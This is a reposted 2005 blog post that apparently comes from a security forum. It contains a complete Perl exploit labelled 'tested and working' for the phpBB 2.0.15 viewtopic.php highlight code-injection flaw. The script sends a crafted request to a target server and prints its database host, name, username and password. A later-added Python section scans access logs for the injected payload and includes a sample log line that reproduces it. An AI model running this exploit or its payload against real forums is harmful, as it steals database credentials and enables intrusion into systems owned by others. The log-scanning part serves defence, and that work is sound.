phpBB 2.0.15 (highlight) Database Authentication Details Exploit

Original post, IT General. Author: coolwinds. Posted: 2005-07-04 09:13:25

phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability. This exploit gives the user all the details about the database connection, such as database host, username, password and database name. Written by SecureD, gvr.secured@gmail.com, 2005.

Greetings to GvR, Jumento, PP, CKrew & friends


#!/usr/bin/perl

# tested and working /str0ke

# ****************************************************************************
# **                                                                        **
# **  phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability        **
# **  This exploit gives the user all the details about the database        **
# **  connection such as database host, username, password and             **
# **  database name.                                                        **
# **                                                                        **
# **  Written by SecureD, gvr.secured@gmail.com, 2005                       **
# **                                                                        **
# **  Greetings to GvR, Jumento, PP, CKrew & friends                        **
# **                                                                        **
# ****************************************************************************

use strict;
use warnings;
use IO::Socket;

print "+-----------------------------------------------------------------------+\r\n";
print "| PhpBB 2.0.15 Database Authentication Details Exploit                  |\r\n";
print "| By SecureD gvr.secured\@gmail.com                                      |\r\n";
print "+-----------------------------------------------------------------------+\r\n";

if (@ARGV < 3) {
    print "Usage:\r\n";
    print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";
    print "SERVER       - Server where PhpBB is installed.\r\n";
    print "DIR          - PHPBB directory or / for no directory.\r\n";
    print "THREADID     - Id of an existing thread.\r\n";
    print "COOKIESTRING - Optional, cookie string of the http request.\r\n";
    print "               Use this when a thread needs authentication for viewing\r\n";
    print "               You can use Firefox in combination with \"Live HTTP\r\n";
    print "               Headers\" to get this cookiestring.\r\n\r\n";
    print "Example 1 (with cookiestring):\r\n";
    print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; phpbb2mysql_sid=10dae92b780914332896df43808c4e09\"\r\n\r\n";
    print "Example 2 (without cookiestring):\r\n";
    print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20\r\n";
    exit();
}

my $serv     = $ARGV[0];
my $dir      = $ARGV[1];
my $threadid = $ARGV[2];
my $cookie   = $ARGV[3];

# Strip a leading "http://" so only the host name is used for the TCP connection.
$serv =~ s/^http:\/\///;

# Marker printed on both sides of every value so the response can be split.
my $delimit = "GvRSecureD";

# Request that injects a printf() of the database-config variables into the
# highlight parameter; "\$" keeps the PHP variable names literal in the URL.
my $sploit = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight='.printf($delimit.";
$sploit .= "\$dbhost.";
$sploit .= "$delimit.";
$sploit .= "\$dbname.";
$sploit .= "$delimit.";
$sploit .= "\$dbuser.";
$sploit .= "$delimit.";
$sploit .= "\$dbpasswd.";
$sploit .= "$delimit).'";

my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $serv, PeerPort => 80)
    or die "[+] Connecting ... Could not connect to host.\n\n";

print "[+] Connecting OK\n";
sleep(1);

print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1\r\n";
print $sock "Host: $serv\r\n";
if (defined $cookie) {
    print $sock "Cookie: $cookie\r\n";
}
print $sock "Connection: close\r\n\r\n";

my $success = 0;
my @array;

# Look for the delimiter in the response. The line that merely echoes the
# request URL inside an href is skipped; the line carrying the printf() output
# is split on the delimiter into @array (host, name, user, password).
while (my $answer = <$sock>) {
    my $delimitIndex = index $answer, $delimit;
    if ($delimitIndex >= 0) {
        $success = 1;
        my $urlIndex = index $answer, "href";
        if ($urlIndex < 0) {
            $answer = substr($answer, $delimitIndex + length($delimit));
            while (length($answer) > 0) {
                my $nex = index($answer, $delimit);
                if ($nex > 0) {
                    push(@array, substr($answer, 0, $nex));
                    $answer = substr($answer, $nex + length($delimit));
                } else {
                    $answer = "";
                }
            }
        }
    }
}

close($sock);

if ($success == 1) {
    print "OK\n";
    sleep(1);
    print "[+] Database Host: " . $array[0] . "\n";
    sleep(1);
    print "[+] Database Name: " . $array[1] . "\n";
    sleep(1);
    print "[+] Username: " . $array[2] . "\n";
    sleep(1);
    print "[+] Password: " . $array[3] . "\n";
    sleep(1);
} else {
    print "FAILED\n";
}
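As an added defensive example (not part of the original post or of SecureD's script), the following Python scans constructed Apache combined-format access-log lines for viewtopic.php requests whose highlight parameter carries the quote-and-dot breakout or a function call, as in the request the script above builds. The log format, the regexes and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Apache "combined" access-log format (assumed; adapt the regex to your server).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Shapes a search-term highlight never has but the injected value above does: a quote
# glued to a concatenation dot ('. or .') or an identifier directly followed by "(".
BREAKOUT_RE = re.compile(r"'\s*\.|\.\s*'|[A-Za-z_]\w*\(")

# Constructed sample lines (not real traffic): the second mirrors the request
# the script above sends, the third is a legitimate search containing a quote.
SAMPLE_LOG = """\
192.0.2.10 - - [04/Jul/2005:09:13:25 +0000] "GET /PHPBB/viewtopic.php?t=8&highlight=install+guide HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.11 - - [04/Jul/2005:09:14:01 +0000] "GET /PHPBB/viewtopic.php?t=8&highlight='.printf(GvRSecureD.$dbhost.GvRSecureD).' HTTP/1.1" 200 5300 "-" "-"
192.0.2.12 - - [04/Jul/2005:09:15:42 +0000] "GET /PHPBB/viewtopic.php?t=20&highlight=don%27t+panic HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
192.0.2.13 - - [04/Jul/2005:09:16:10 +0000] "GET /PHPBB/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

def suspicious_highlight(uri):
    """Return the decoded highlight value when it looks like injected code, else None."""
    parts = urlsplit(uri)
    if not parts.path.lower().endswith("/viewtopic.php"):
        return None
    for raw in parse_qs(parts.query, keep_blank_values=True).get("highlight", []):
        value = unquote_plus(raw)  # second decode catches %2527-style double encoding
        if BREAKOUT_RE.search(value):
            return value
    return None

def scan_log(text):
    """Return one hit per request whose highlight parameter carries a breakout."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue  # line is not in the expected format
        value = suspicious_highlight(m.group("uri"))
        if value is not None:
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "status": m.group("status"), "highlight": value})
    return hits

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"{h['ts']} {h['ip']} status={h['status']} highlight={h['highlight']!r}")
```

A legitimate search term with an apostrophe ("don't panic") is not flagged, while the injected value is reported even when the quotes arrive double-encoded.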

From "ITPUB Blog", link: http://blog.itpub.net/83980/viewspace-801584/. If you repost this, please credit the source; otherwise legal liability will be pursued.
